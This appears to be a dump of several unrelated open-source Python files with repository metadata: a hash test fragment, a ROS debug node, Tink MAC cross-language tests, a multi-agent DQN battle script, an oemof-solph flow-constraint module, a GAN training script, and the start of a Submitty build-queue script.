("Test7|blake2b", "04ed9de6f876fdee30be2d19304b32550f9943b750a7e3c2d40cda9b9a287cf7c2ec15ae31d029518deab1f4b9dd78da9e7a7add05e20eb5e909943d2e0b4937|3d2e0b4937"),
("Test8|blake2s", "6658043aeb25afe1199b61f1880af58d2eae9211bb94390f72069d5d6ec07181|5d6ec07181"),
]
pas = check_password()
for (k, v) in list_test:
testcase = str.split(k, "|")
inout = str.split(v, "|")
pas.action(inout[0])
            hex_digest = pas.hex(inout[0], 10)
            # Every branch of the former if/elif chain assigned the same
            # value, so the chain collapses to a single assignment (renamed
            # from 'hex' to avoid shadowing the builtin).
            out = hex_digest
self.assertEqual(inout[1], out)
| 41.138158
| 191
| 0.560371
|
4a18d362f8c86407938eca7b648ffd90ce5c5b8c
| 1,885
|
py
|
Python
|
script/Debug/debug_ardu.py
|
NeelamMahapatro/Roborex_Chess
|
cc2666c56c09fc21a7c76879e2f19e594ddd474c
|
[
"MIT"
] | 3
|
2019-06-20T04:17:54.000Z
|
2020-07-17T15:34:14.000Z
|
script/Debug/debug_ardu.py
|
NeelamMahapatro/Roborex_Chess
|
cc2666c56c09fc21a7c76879e2f19e594ddd474c
|
[
"MIT"
] | 1
|
2018-03-31T09:48:58.000Z
|
2018-03-31T09:48:58.000Z
|
script/Debug/debug_ardu.py
|
NeelamMahapatro/Roborex_Chess
|
cc2666c56c09fc21a7c76879e2f19e594ddd474c
|
[
"MIT"
] | 6
|
2018-03-30T12:24:25.000Z
|
2020-07-17T15:33:48.000Z
|
#!/usr/bin/env python
################################################################################
##
## MIT License
##
## Copyright (c) 2018 Team Roborex, NIT Rourkela
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all
## copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
##
################################################################################
################################################################################
##
## AUTHORS: Prabin Rath
##
################################################################################
import rospy
from std_msgs.msg import String
filter_flag=False
def callback(data):
    global filter_flag
    if data.data == 'ok' and not filter_flag:
        print(data.data)
        filter_flag = True
    if data.data != 'ok':
        # The original body here was empty (a syntax error) and 'data.dat'
        # was a typo; resetting the one-shot filter is the most plausible
        # intent, so that the next 'ok' message is printed again.
        filter_flag = False
def debug_ardu():
rospy.init_node('debug_ardu')
rospy.Subscriber('user_swh', String, callback)
rospy.spin()
if __name__ == '__main__':
debug_ardu()
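# Manual test sketch (added; not part of the original script): with the node
# running, publish to the subscribed topic from another shell to exercise the
# callback, e.g.
#   rostopic pub user_swh std_msgs/String "data: 'ok'"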
| 36.25
| 81
| 0.612202
|
4a18d37c75da750ba721c5f1647bbe8a50b21586
| 5,706
|
py
|
Python
|
testing/cross_language/mac_test.py
|
rosstimothy/tink
|
4f9daa3ba6210f2d888549a9f52a50cbc123f926
|
[
"Apache-2.0"
] | null | null | null |
testing/cross_language/mac_test.py
|
rosstimothy/tink
|
4f9daa3ba6210f2d888549a9f52a50cbc123f926
|
[
"Apache-2.0"
] | null | null | null |
testing/cross_language/mac_test.py
|
rosstimothy/tink
|
4f9daa3ba6210f2d888549a9f52a50cbc123f926
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cross-language tests for the MAC primitive."""
from absl.testing import absltest
from absl.testing import parameterized
import tink
from tink import mac
from tink.proto import common_pb2
from tink.proto import tink_pb2
from util import keyset_builder
from util import supported_key_types
from util import testing_servers
SUPPORTED_LANGUAGES = testing_servers.SUPPORTED_LANGUAGES_BY_PRIMITIVE['mac']
def key_rotation_test_cases():
for compute_lang in SUPPORTED_LANGUAGES:
for verify_lang in SUPPORTED_LANGUAGES:
for prefix in [tink_pb2.RAW, tink_pb2.TINK]:
old_key_tmpl = mac.mac_key_templates.create_hmac_key_template(
key_size=32, tag_size=16, hash_type=common_pb2.SHA256)
old_key_tmpl.output_prefix_type = prefix
new_key_tmpl = mac.mac_key_templates.HMAC_SHA512_512BITTAG
yield (compute_lang, verify_lang, old_key_tmpl, new_key_tmpl)
def setUpModule():
mac.register()
testing_servers.start('mac')
def tearDownModule():
testing_servers.stop()
class MacTest(parameterized.TestCase):
@parameterized.parameters(
supported_key_types.test_cases(supported_key_types.MAC_KEY_TYPES))
def test_encrypt_decrypt(self, key_template_name, supported_langs):
self.assertNotEmpty(supported_langs)
key_template = supported_key_types.KEY_TEMPLATE[key_template_name]
# Take the first supported language to generate the keyset.
keyset = testing_servers.new_keyset(supported_langs[0], key_template)
supported_macs = [
testing_servers.mac(lang, keyset) for lang in supported_langs
]
unsupported_macs = [
testing_servers.mac(lang, keyset)
for lang in SUPPORTED_LANGUAGES
if lang not in supported_langs
]
for p in supported_macs:
data = (
b'This is some data to be authenticated using key_template '
b'%s in %s.' % (key_template_name.encode('utf8'),
p.lang.encode('utf8')))
mac_value = p.compute_mac(data)
for p2 in supported_macs:
self.assertIsNone(p2.verify_mac(mac_value, data))
for p2 in unsupported_macs:
with self.assertRaises(tink.TinkError):
p2.verify_mac(mac_value, data)
for p in unsupported_macs:
with self.assertRaises(tink.TinkError):
p.compute_mac(data)
@parameterized.parameters(key_rotation_test_cases())
def test_key_rotation(
self, compute_lang, verify_lang, old_key_tmpl, new_key_tmpl):
# Do a key rotation from an old key generated from old_key_tmpl to a new
# key generated from new_key_tmpl. MAC computation and verification are done
# in languages compute_lang and verify_lang.
builder = keyset_builder.new_keyset_builder()
older_key_id = builder.add_new_key(old_key_tmpl)
builder.set_primary_key(older_key_id)
compute_mac1 = testing_servers.mac(compute_lang, builder.keyset())
verify_mac1 = testing_servers.mac(verify_lang, builder.keyset())
newer_key_id = builder.add_new_key(new_key_tmpl)
compute_mac2 = testing_servers.mac(compute_lang, builder.keyset())
verify_mac2 = testing_servers.mac(verify_lang, builder.keyset())
builder.set_primary_key(newer_key_id)
compute_mac3 = testing_servers.mac(compute_lang, builder.keyset())
verify_mac3 = testing_servers.mac(verify_lang, builder.keyset())
builder.disable_key(older_key_id)
compute_mac4 = testing_servers.mac(compute_lang, builder.keyset())
verify_mac4 = testing_servers.mac(verify_lang, builder.keyset())
self.assertNotEqual(older_key_id, newer_key_id)
# 1 uses the older key. So 1, 2 and 3 can verify the mac, but not 4.
mac_value1 = compute_mac1.compute_mac(b'plaintext')
verify_mac1.verify_mac(mac_value1, b'plaintext')
verify_mac2.verify_mac(mac_value1, b'plaintext')
verify_mac3.verify_mac(mac_value1, b'plaintext')
with self.assertRaises(tink.TinkError):
verify_mac4.verify_mac(mac_value1, b'plaintext')
# 2 uses the older key. So 1, 2 and 3 can verify the mac, but not 4.
mac_value2 = compute_mac2.compute_mac(b'plaintext')
verify_mac1.verify_mac(mac_value2, b'plaintext')
verify_mac2.verify_mac(mac_value2, b'plaintext')
verify_mac3.verify_mac(mac_value2, b'plaintext')
with self.assertRaises(tink.TinkError):
verify_mac4.verify_mac(mac_value2, b'plaintext')
# 3 uses the newer key. So 2, 3 and 4 can verify the mac, but not 1.
mac_value3 = compute_mac3.compute_mac(b'plaintext')
with self.assertRaises(tink.TinkError):
verify_mac1.verify_mac(mac_value3, b'plaintext')
verify_mac2.verify_mac(mac_value3, b'plaintext')
verify_mac3.verify_mac(mac_value3, b'plaintext')
verify_mac4.verify_mac(mac_value3, b'plaintext')
# 4 uses the newer key. So 2, 3 and 4 can verify the mac, but not 1.
mac_value4 = compute_mac4.compute_mac(b'plaintext')
with self.assertRaises(tink.TinkError):
verify_mac1.verify_mac(mac_value4, b'plaintext')
verify_mac2.verify_mac(mac_value4, b'plaintext')
verify_mac3.verify_mac(mac_value4, b'plaintext')
verify_mac4.verify_mac(mac_value4, b'plaintext')
if __name__ == '__main__':
absltest.main()
| 41.05036
| 80
| 0.746057
|
4a18d61df539e0d271a324425ce4ca91105d12ff
| 3,508
|
py
|
Python
|
battle/pettingzoomagentDQNdecentralizedparallel.py
|
Sriram94/DMFG
|
9206d4302350bed165e6812e8874041335ecf8a8
|
[
"MIT"
] | 4
|
2021-12-17T08:00:28.000Z
|
2022-02-12T12:25:24.000Z
|
battle/pettingzoomagentDQNdecentralizedparallel.py
|
Sriram94/DMFG
|
9206d4302350bed165e6812e8874041335ecf8a8
|
[
"MIT"
] | null | null | null |
battle/pettingzoomagentDQNdecentralizedparallel.py
|
Sriram94/DMFG
|
9206d4302350bed165e6812e8874041335ecf8a8
|
[
"MIT"
] | null | null | null |
from pettingzoo.magent import battle_v2
from RL_brainDQN import DeepQNetwork
import csv
import numpy as np
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
def change_observation(observation):
observation = observation.tolist()
new_list = []
for i in range(len(observation)):
for j in range(len(observation[i])):
for k in range(len(observation[i][j])):
new_list.append(observation[i][j][k])
new_observation = np.array(new_list)
return new_observation
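# Note (added): the triple loop above flattens a 3-D observation in C order,
# which is equivalent to the NumPy one-liner below; a minimal sketch assuming
# 'observation' is (or converts to) an ndarray:
#   new_observation = np.asarray(observation).reshape(-1)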
def run_battle(parallel_env):
step = 0
with open('pettingzoomagentDQN.csv', 'w+') as myfile:
myfile.write('{0},{1},{2}\n'.format("Episode", "sumofrewards(DQN)", "sumofrewards(DQN)"))
num_episode = 0
while num_episode < 2000:
agent_num = 0
observation = parallel_env.reset()
list_tmp = [0]
accumulated_reward = [0,0]
max_cycles = 500
actions = {}
for step in range(max_cycles):
team_size = [0,0]
for agent in parallel_env.agents:
agent_observation = observation[agent]
agent_observation = change_observation(agent_observation)
action = RL[agent].choose_action(agent_observation)
actions[agent] = action
new_observation, rewards, dones, infos = parallel_env.step(actions)
if not parallel_env.agents:
break
for agent in parallel_env.agents:
if "red" in agent:
team = 0
else:
team = 1
accumulated_reward[team] = accumulated_reward[team] + rewards[agent]
agent_observation = observation[agent]
agent_observation = change_observation(agent_observation)
agent_nextobservation = new_observation[agent]
agent_nextobservation = change_observation(agent_nextobservation)
RL[agent].store_transition(agent_observation, actions[agent], rewards[agent], agent_nextobservation)
observation = new_observation
print("The step we are at is", step)
for agent in parallel_env.agents:
RL[agent].learn()
print("The episode is", num_episode)
with open('pettingzoomagentDQN.csv', 'a') as myfile:
myfile.write('{0},{1},{2}\n'.format(num_episode, accumulated_reward[0], accumulated_reward[1]))
num_episode = num_episode + 1
team_size = parallel_env.team_size()
print("The number of red agents alive is", team_size[0])
print("The number of blue agents alive is", team_size[1])
for agent in parallel_env.agents:
RL[agent].save_model("./"+agent+"/dqnmodel.ckpt")
# end of game
print('game over')
if __name__ == "__main__":
parallel_env = battle_v2.parallel_env(map_size = 28, attack_opponent_reward=5)
parallel_env.seed(1)
RL = {}
sess = tf.Session()
size = len(parallel_env.agents)
for agent in parallel_env.agents:
new_name = agent
RL[agent] = DeepQNetwork(21,6929, sess, name = new_name)
sess.run(tf.global_variables_initializer())
run_battle(parallel_env)
| 31.603604
| 116
| 0.574971
|
4a18d63bf253d6255e1ed516047eae50cffccf8e
| 10,574
|
py
|
Python
|
src/oemof/solph/blocks/flow.py
|
lensum/oemof-solph
|
75789b1578035d0b658c4b97fcc41fc3ca61638e
|
[
"MIT"
] | 59
|
2020-04-01T12:02:37.000Z
|
2022-03-26T06:31:06.000Z
|
src/oemof/solph/blocks/flow.py
|
lensum/oemof-solph
|
75789b1578035d0b658c4b97fcc41fc3ca61638e
|
[
"MIT"
] | 170
|
2020-03-31T12:04:26.000Z
|
2022-03-31T15:41:04.000Z
|
src/oemof/solph/blocks/flow.py
|
lensum/oemof-solph
|
75789b1578035d0b658c4b97fcc41fc3ca61638e
|
[
"MIT"
] | 33
|
2020-04-28T11:17:09.000Z
|
2022-03-14T21:25:08.000Z
|
# -*- coding: utf-8 -*-
"""Creating sets, variables, constraints and parts of the objective function
for Flow objects.
SPDX-FileCopyrightText: Uwe Krien <krien@uni-bremen.de>
SPDX-FileCopyrightText: Simon Hilpert
SPDX-FileCopyrightText: Cord Kaldemeyer
SPDX-FileCopyrightText: Patrik Schönfeldt
SPDX-FileCopyrightText: Birgit Schachler
SPDX-FileCopyrightText: jnnr
SPDX-FileCopyrightText: jmloenneberga
SPDX-License-Identifier: MIT
"""
from pyomo.core import BuildAction
from pyomo.core import Constraint
from pyomo.core import NonNegativeIntegers
from pyomo.core import Set
from pyomo.core import Var
from pyomo.core.base.block import SimpleBlock
class Flow(SimpleBlock):
r""" Flow block with definitions for standard flows.
**The following variables are created**:
negative_gradient :
Difference of a flow in consecutive timesteps if flow is reduced
indexed by NEGATIVE_GRADIENT_FLOWS, TIMESTEPS.
positive_gradient :
Difference of a flow in consecutive timesteps if flow is increased
        indexed by POSITIVE_GRADIENT_FLOWS, TIMESTEPS.
**The following sets are created:** (-> see basic sets at :class:`.Model` )
SUMMED_MAX_FLOWS
A set of flows with the attribute :attr:`summed_max` being not None.
SUMMED_MIN_FLOWS
A set of flows with the attribute :attr:`summed_min` being not None.
NEGATIVE_GRADIENT_FLOWS
A set of flows with the attribute :attr:`negative_gradient` being not
None.
POSITIVE_GRADIENT_FLOWS
A set of flows with the attribute :attr:`positive_gradient` being not
None
INTEGER_FLOWS
A set of flows where the attribute :attr:`integer` is True (forces flow
to only take integer values)
    **The following constraints are built:**
Flow max sum :attr:`om.Flow.summed_max[i, o]`
.. math::
\sum_t flow(i, o, t) \cdot \tau
\leq summed\_max(i, o) \cdot nominal\_value(i, o), \\
\forall (i, o) \in \textrm{SUMMED\_MAX\_FLOWS}.
Flow min sum :attr:`om.Flow.summed_min[i, o]`
.. math::
\sum_t flow(i, o, t) \cdot \tau
\geq summed\_min(i, o) \cdot nominal\_value(i, o), \\
\forall (i, o) \in \textrm{SUMMED\_MIN\_FLOWS}.
Negative gradient constraint
:attr:`om.Flow.negative_gradient_constr[i, o]`:
.. math::
flow(i, o, t-1) - flow(i, o, t) \geq \
negative\_gradient(i, o, t), \\
\forall (i, o) \in \textrm{NEGATIVE\_GRADIENT\_FLOWS}, \\
\forall t \in \textrm{TIMESTEPS}.
Positive gradient constraint
:attr:`om.Flow.positive_gradient_constr[i, o]`:
.. math:: flow(i, o, t) - flow(i, o, t-1) \geq \
        positive\_gradient(i, o, t), \\
\forall (i, o) \in \textrm{POSITIVE\_GRADIENT\_FLOWS}, \\
\forall t \in \textrm{TIMESTEPS}.
**The following parts of the objective function are created:**
If :attr:`variable_costs` are set by the user:
.. math::
\sum_{(i,o)} \sum_t flow(i, o, t) \cdot variable\_costs(i, o, t)
The expression can be accessed by :attr:`om.Flow.variable_costs` and
their value after optimization by :meth:`om.Flow.variable_costs()` .
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _create(self, group=None):
r"""Creates sets, variables and constraints for all standard flows.
Parameters
----------
group : list
List containing tuples containing flow (f) objects and the
associated source (s) and target (t)
of flow e.g. groups=[(s1, t1, f1), (s2, t2, f2),..]
"""
if group is None:
return None
m = self.parent_block()
# ########################## SETS #################################
# set for all flows with an global limit on the flow over time
self.SUMMED_MAX_FLOWS = Set(
initialize=[
(g[0], g[1])
for g in group
if g[2].summed_max is not None
and g[2].nominal_value is not None
]
)
self.SUMMED_MIN_FLOWS = Set(
initialize=[
(g[0], g[1])
for g in group
if g[2].summed_min is not None
and g[2].nominal_value is not None
]
)
self.NEGATIVE_GRADIENT_FLOWS = Set(
initialize=[
(g[0], g[1])
for g in group
if g[2].negative_gradient["ub"][0] is not None
]
)
self.POSITIVE_GRADIENT_FLOWS = Set(
initialize=[
(g[0], g[1])
for g in group
if g[2].positive_gradient["ub"][0] is not None
]
)
self.INTEGER_FLOWS = Set(
initialize=[(g[0], g[1]) for g in group if g[2].integer]
)
# ######################### Variables ################################
self.positive_gradient = Var(self.POSITIVE_GRADIENT_FLOWS, m.TIMESTEPS)
self.negative_gradient = Var(self.NEGATIVE_GRADIENT_FLOWS, m.TIMESTEPS)
self.integer_flow = Var(
self.INTEGER_FLOWS, m.TIMESTEPS, within=NonNegativeIntegers
)
# set upper bound of gradient variable
for i, o, f in group:
if m.flows[i, o].positive_gradient["ub"][0] is not None:
for t in m.TIMESTEPS:
self.positive_gradient[i, o, t].setub(
f.positive_gradient["ub"][t] * f.nominal_value
)
if m.flows[i, o].negative_gradient["ub"][0] is not None:
for t in m.TIMESTEPS:
self.negative_gradient[i, o, t].setub(
f.negative_gradient["ub"][t] * f.nominal_value
)
# ######################### CONSTRAINTS ###############################
def _flow_summed_max_rule(model):
"""Rule definition for build action of max. sum flow constraint."""
for inp, out in self.SUMMED_MAX_FLOWS:
lhs = sum(
m.flow[inp, out, ts] * m.timeincrement[ts]
for ts in m.TIMESTEPS
)
rhs = (
m.flows[inp, out].summed_max
* m.flows[inp, out].nominal_value
)
self.summed_max.add((inp, out), lhs <= rhs)
self.summed_max = Constraint(self.SUMMED_MAX_FLOWS, noruleinit=True)
self.summed_max_build = BuildAction(rule=_flow_summed_max_rule)
def _flow_summed_min_rule(model):
"""Rule definition for build action of min. sum flow constraint."""
for inp, out in self.SUMMED_MIN_FLOWS:
lhs = sum(
m.flow[inp, out, ts] * m.timeincrement[ts]
for ts in m.TIMESTEPS
)
rhs = (
m.flows[inp, out].summed_min
* m.flows[inp, out].nominal_value
)
self.summed_min.add((inp, out), lhs >= rhs)
self.summed_min = Constraint(self.SUMMED_MIN_FLOWS, noruleinit=True)
self.summed_min_build = BuildAction(rule=_flow_summed_min_rule)
def _positive_gradient_flow_rule(model):
"""Rule definition for positive gradient constraint."""
for inp, out in self.POSITIVE_GRADIENT_FLOWS:
for ts in m.TIMESTEPS:
if ts > 0:
lhs = m.flow[inp, out, ts] - m.flow[inp, out, ts - 1]
rhs = self.positive_gradient[inp, out, ts]
self.positive_gradient_constr.add(
(inp, out, ts), lhs <= rhs
)
else:
pass # return(Constraint.Skip)
self.positive_gradient_constr = Constraint(
self.POSITIVE_GRADIENT_FLOWS, m.TIMESTEPS, noruleinit=True
)
self.positive_gradient_build = BuildAction(
rule=_positive_gradient_flow_rule
)
def _negative_gradient_flow_rule(model):
"""Rule definition for negative gradient constraint."""
for inp, out in self.NEGATIVE_GRADIENT_FLOWS:
for ts in m.TIMESTEPS:
if ts > 0:
lhs = m.flow[inp, out, ts - 1] - m.flow[inp, out, ts]
rhs = self.negative_gradient[inp, out, ts]
self.negative_gradient_constr.add(
(inp, out, ts), lhs <= rhs
)
else:
pass # return(Constraint.Skip)
self.negative_gradient_constr = Constraint(
self.NEGATIVE_GRADIENT_FLOWS, m.TIMESTEPS, noruleinit=True
)
self.negative_gradient_build = BuildAction(
rule=_negative_gradient_flow_rule
)
def _integer_flow_rule(block, ii, oi, ti):
"""Force flow variable to NonNegativeInteger values."""
return self.integer_flow[ii, oi, ti] == m.flow[ii, oi, ti]
self.integer_flow_constr = Constraint(
self.INTEGER_FLOWS, m.TIMESTEPS, rule=_integer_flow_rule
)
def _objective_expression(self):
r"""Objective expression for all standard flows with fixed costs
and variable costs.
"""
m = self.parent_block()
variable_costs = 0
gradient_costs = 0
for i, o in m.FLOWS:
if m.flows[i, o].variable_costs[0] is not None:
for t in m.TIMESTEPS:
variable_costs += (
m.flow[i, o, t]
* m.objective_weighting[t]
* m.flows[i, o].variable_costs[t]
)
if m.flows[i, o].positive_gradient["ub"][0] is not None:
for t in m.TIMESTEPS:
gradient_costs += (
self.positive_gradient[i, o, t]
* m.flows[i, o].positive_gradient["costs"]
)
if m.flows[i, o].negative_gradient["ub"][0] is not None:
for t in m.TIMESTEPS:
gradient_costs += (
self.negative_gradient[i, o, t]
* m.flows[i, o].negative_gradient["costs"]
)
return variable_costs + gradient_costs
| 36.588235
| 79
| 0.541517
|
4a18d6b287ccd5eb645aac0cc2d74f142457f0a2
| 9,576
|
py
|
Python
|
train.py
|
yaxingwang/MineGAN
|
a810f2d77f36ea9cf6993dede958b6f5d458f4b6
|
[
"MIT"
] | 76
|
2020-03-04T16:25:10.000Z
|
2022-03-25T08:58:18.000Z
|
train.py
|
yaxingwang/MineGAN
|
a810f2d77f36ea9cf6993dede958b6f5d458f4b6
|
[
"MIT"
] | 7
|
2020-05-24T07:02:44.000Z
|
2022-02-10T01:57:40.000Z
|
train.py
|
yaxingwang/MineGAN
|
a810f2d77f36ea9cf6993dede958b6f5d458f4b6
|
[
"MIT"
] | 9
|
2020-07-04T16:35:14.000Z
|
2022-03-12T06:20:40.000Z
|
""" BigGAN: The Authorized Unofficial PyTorch release
Code by A. Brock and A. Andonian
This code is an unofficial reimplementation of
"Large-Scale GAN Training for High Fidelity Natural Image Synthesis,"
by A. Brock, J. Donahue, and K. Simonyan (arXiv 1809.11096).
Let's go.
"""
import os
import functools
import math
import numpy as np
from tqdm import tqdm, trange
import torch
import torch.nn as nn
from torch.nn import init
import torch.optim as optim
import torch.nn.functional as F
from torch.nn import Parameter as P
# Import my stuff
import inception_utils
import utils
import losses
import train_fns
from sync_batchnorm import patch_replication_callback
import pdb
# The main training file. Config is a dictionary specifying the configuration
# of this training run.
def run(config):
# Update the config dict as necessary
# This is for convenience, to add settings derived from the user-specified
# configuration into the config-dict (e.g. inferring the number of classes
# and size of the images from the dataset, passing in a pytorch object
# for the activation specified as a string)
config['resolution'] = utils.imsize_dict[config['dataset']]
config['n_classes'] = utils.nclass_dict[config['dataset']]
config['G_activation'] = utils.activation_dict[config['G_nl']]
config['D_activation'] = utils.activation_dict[config['D_nl']]
# By default, skip init if resuming training.
if config['resume']:
print('Skipping initialization for training resumption...')
config['skip_init'] = True
config = utils.update_config_roots(config)
device = 'cuda'
# Seed RNG
utils.seed_rng(config['seed'])
# Prepare root folders if necessary
utils.prepare_root(config)
# Setup cudnn.benchmark for free speed
torch.backends.cudnn.benchmark = True
# Import the model--this line allows us to dynamically select different files.
model = __import__(config['model'])
experiment_name = (config['experiment_name'] if config['experiment_name']
else utils.name_from_config(config))
print('Experiment name is %s' % experiment_name)
# Next, build the model
# Minor
M = model.Minor(**config).to(device)
G = model.Generator(**config).to(device)
D = model.Discriminator(**config).to(device)
# If using EMA, prepare it
if config['ema']:
print('Preparing EMA for G with decay of {}'.format(config['ema_decay']))
G_ema = model.Generator(**{**config, 'skip_init':True,
'no_optim': True}).to(device)
ema = utils.ema(G, G_ema, config['ema_decay'], config['ema_start'])
else:
G_ema, ema = None, None
# FP16?
  if config['G_fp16']:  # yaxing: here it is False
print('Casting G to float16...')
G = G.half()
if config['ema']:
G_ema = G_ema.half()
  if config['D_fp16']:  # yaxing: here it is False
print('Casting D to fp16...')
D = D.half()
# Consider automatically reducing SN_eps?
GD = model.G_D(G, D, M)
print(G)
print(D)
print(M)
print('Number of params in G: {} D: {} M: {}'.format(
*[sum([p.data.nelement() for p in net.parameters()]) for net in [G,D,M]]))
# Prepare state dict, which holds things like epoch # and itr #
state_dict = {'itr': 0, 'epoch': 0, 'save_num': 0, 'save_best_num': 0,
'best_IS': 0, 'best_FID': 999999, 'config': config}
# If loading from a pre-trained model, load weights
if config['resume']:
print('Loading weights...')
utils.load_weights(G, D, M, state_dict,
config['weights_root'], experiment_name,
config['load_weights'] if config['load_weights'] else None,
G_ema if config['ema'] else None)
# If parallel, parallelize the GD module
if config['parallel']:
GD = nn.DataParallel(GD)
if config['cross_replica']:
patch_replication_callback(GD)
# Prepare loggers for stats; metrics holds test metrics,
# lmetrics holds any desired training metrics.
test_metrics_fname = '%s/%s_log.jsonl' % (config['logs_root'],
experiment_name)
train_metrics_fname = '%s/%s' % (config['logs_root'], experiment_name)
print('Inception Metrics will be saved to {}'.format(test_metrics_fname))
test_log = utils.MetricsLogger(test_metrics_fname,
reinitialize=(not config['resume']))
print('Training Metrics will be saved to {}'.format(train_metrics_fname))
train_log = utils.MyLogger(train_metrics_fname,
reinitialize=(not config['resume']),
logstyle=config['logstyle'])
# Write metadata
utils.write_metadata(config['logs_root'], experiment_name, config, state_dict)
# Prepare data; the Discriminator's batch size is all that needs to be passed
# to the dataloader, as G doesn't require dataloading.
# Note that at every loader iteration we pass in enough data to complete
# a full D iteration (regardless of number of D steps and accumulations)
D_batch_size = (config['batch_size'] * config['num_D_steps']
* config['num_D_accumulations'])
loaders = utils.get_data_loaders(**{**config, 'batch_size': D_batch_size,
'start_itr': state_dict['itr']})
# Prepare inception metrics: FID and IS
get_inception_metrics = inception_utils.prepare_inception_metrics(config['dataset'], config['parallel'], config['no_fid'])
# Prepare noise and randomly sampled label arrays
# Allow for different batch sizes in G
G_batch_size = max(config['G_batch_size'], config['batch_size'])
z_, y_ = utils.prepare_z_y(G_batch_size, G.dim_z, config['n_classes'],
device=device, fp16=config['G_fp16'])
  # Prepare a fixed z & y to see individual sample evolution throughout training
fixed_z, fixed_y = utils.prepare_z_y(G_batch_size, G.dim_z,
config['n_classes'], device=device,
fp16=config['G_fp16'])
fixed_z.sample_()
fixed_y.sample_()
# Loaders are loaded, prepare the training function
if config['which_train_fn'] == 'GAN': # yaxing: here it is GAN
train = train_fns.GAN_training_function(G, D, M, GD, z_, y_,
ema, state_dict, config)
# Else, assume debugging and use the dummy train fn
else:
train = train_fns.dummy_training_function()
# Prepare Sample function for use with inception metrics
sample = functools.partial(utils.sample,
G=(G_ema if config['ema'] and config['use_ema']
else G), M=M,
z_=z_, y_=y_, config=config)
print('Beginning training at epoch %d...' % state_dict['epoch'])
# Train for specified number of epochs, although we mostly track G iterations.
for epoch in range(state_dict['epoch'], config['num_epochs']):
#for epoch in range(state_dict['epoch'], 7):
# Which progressbar to use? TQDM or my own?
    if config['pbar'] == 'mine':  # yaxing: here it is 'mine'
pbar = utils.progress(loaders[0],displaytype='s1k' if config['use_multiepoch_sampler'] else 'eta')
else:
pbar = tqdm(loaders[0])
for i, (x, y) in enumerate(pbar):
# Increment the iteration counter
state_dict['itr'] += 1
# Make sure G and D are in training mode, just in case they got set to eval
# For D, which typically doesn't have BN, this shouldn't matter much.
G.train()
D.train()
M.train()
if config['ema']:
G_ema.train()
      if config['D_fp16']:  # yaxing: here it is False
x, y = x.to(device).half(), y.to(device)
else:
x, y = x.to(device), y.to(device)
if state_dict['itr'] < (138000 + 300): # 138000 is the last iteration of the BigGAN
stage = 1
else:
stage = 2
metrics = train(x, y, stage)
train_log.log(itr=int(state_dict['itr']), **metrics)
# Every sv_log_interval, log singular values
if (config['sv_log_interval'] > 0) and (not (state_dict['itr'] % config['sv_log_interval'])):
train_log.log(itr=int(state_dict['itr']),
**{**utils.get_SVs(G, 'G'), **utils.get_SVs(D, 'D')})
# If using my progbar, print metrics.
if config['pbar'] == 'mine':
print(', '.join(['itr: %d' % state_dict['itr']]
+ ['%s : %+4.3f' % (key, metrics[key])
for key in metrics]), end=' ')
# Save weights and copies as configured at specified interval
if not (state_dict['itr'] % config['save_every']):
if config['G_eval_mode']:
          print('Switching G to eval mode...')
G.eval()
M.eval()
if config['ema']:
G_ema.eval()
train_fns.save_and_sample(G, D,M, G_ema, z_, y_, fixed_z, fixed_y,
state_dict, config, experiment_name)
# Test every specified interval
if not (state_dict['itr'] % config['test_every']):
if config['G_eval_mode']:
          print('Switching G to eval mode...')
G.eval()
M.eval()
train_fns.test(G, D, G_ema, z_, y_, state_dict, config, sample,
get_inception_metrics, experiment_name, test_log)
state_dict['epoch'] += 1
def main():
# parse command line and run
parser = utils.prepare_parser()
config = vars(parser.parse_args())
print(config)
run(config)
if __name__ == '__main__':
main()
| 40.066946
| 124
| 0.630952
|
4a18d7178bb4a6c0c00aa1833d7fa406ffacbb15
| 2,889
|
py
|
Python
|
sbin/build_config_upload.py
|
muarachmann/Submitty
|
86cea3d3441419089b1a3058d01c663e6807294c
|
[
"BSD-3-Clause"
] | null | null | null |
sbin/build_config_upload.py
|
muarachmann/Submitty
|
86cea3d3441419089b1a3058d01c663e6807294c
|
[
"BSD-3-Clause"
] | null | null | null |
sbin/build_config_upload.py
|
muarachmann/Submitty
|
86cea3d3441419089b1a3058d01c663e6807294c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
#
# This script is run by a cron job as the DAEMON_USER
#
# Regularly checks a queue to rebuild assignment configurations for recently modified gradeables.
#
import os
import pwd
import time
import subprocess
from submitty_utils import glob
import json
# ------------------------------------------------------------------------
def build_one(data):
semester = data["semester"]
course = data["course"]
# construct the paths for this course
build_script = "/var/local/submitty/courses/" + semester + "/" + course + "/BUILD_" + course + ".sh"
build_output = "/var/local/submitty/courses/" + semester + "/" + course + "/build_script_output.txt"
# construct the command line to build/rebuild/clean/delete the gradeable
build_args = [build_script]
if "gradeable" in data:
build_args.append(data["gradeable"])
if "clean" in data:
build_args.append("--clean")
if "no_build" in data:
build_args.append("--no_build")
with open(build_output, "w") as open_file:
subprocess.call(build_args, stdout=open_file, stderr=open_file)
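# Shape of a queue entry consumed by build_one (added; inferred from the keys
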